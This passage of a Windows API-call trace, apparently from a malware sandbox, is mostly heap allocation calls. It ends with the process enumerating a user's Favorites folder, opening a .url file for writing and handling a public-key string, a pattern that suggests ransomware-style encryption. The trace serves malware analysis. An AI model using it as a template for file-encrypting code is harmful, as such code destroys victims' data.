(HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.306] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.306] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.306] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.306] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.306] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0096.306] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.306] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.306] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.306] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.306] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.306] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.306] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.306] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.307] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.307] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.307] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.307] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.307] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.307] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.307] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.307] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.307] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.308] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.308] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.308] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.308] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.308] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.308] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.308] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.308] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.308] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.308] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.308] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.308] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.308] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.308] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.308] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.309] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.309] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.309] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.309] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.309] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.309] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.309] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.309] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.309] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.309] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.309] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.309] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.309] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.309] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.309] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.309] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.309] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.309] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.309] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.310] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.310] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.310] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.310] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.310] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.310] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.310] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.310] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.310] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.310] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.310] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.310] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.310] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.310] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.310] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.310] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.310] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.310] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.310] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.310] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.311] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.311] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.311] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.311] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.311] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.311] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.311] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.311] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.311] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.311] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.311] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.311] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.311] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.311] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.311] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.311] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.311] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.311] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.311] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.311] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.311] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.311] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.311] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.312] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.312] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.312] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.312] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.312] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.312] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.312] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.312] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.312] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.312] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.312] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.312] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.312] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.312] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.312] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.312] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.312] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.312] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.312] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.312] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.312] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.312] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.312] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.312] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.312] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.312] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.313] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.313] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.313] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.313] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.313] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.313] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.313] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.313] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.313] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.313] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.313] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.313] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.313] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.313] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.313] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.313] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.313] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.313] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.313] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.313] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.313] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.313] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.313] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.313] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.313] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.313] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.313] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.313] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.313] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.313] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.313] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.314] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.314] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.314] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.314] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.314] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.314] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.314] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.314] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.314] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.314] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.314] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.314] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.314] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.314] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.314] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.314] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.314] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.314] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.314] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.314] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.314] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.314] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.314] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.314] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.314] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.314] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.314] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.314] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="Microsoft Websites\\" [0096.315] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3f40 [0096.315] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0096.315] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.315] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0096.315] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a026c0 [0096.315] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0096.315] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0096.315] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.315] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a026c0 | out: hHeap=0x680000) returned 1 [0096.315] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0096.315] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.315] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0096.315] PathFindFileNameW (pszPath="") returned="" [0096.315] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.315] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31c7500 [0096.316] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.316] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0096.316] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0096.316] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.316] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xbe) returned 0x99e6040 [0096.316] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.316] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned=".url" [0096.316] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.317] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=133) returned 1 [0096.317] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.320] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.320] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.321] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.321] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x85, lpOverlapped=0x0) returned 1 [0096.321] lstrlenA (lpString="-----BEGIN PUBLIC 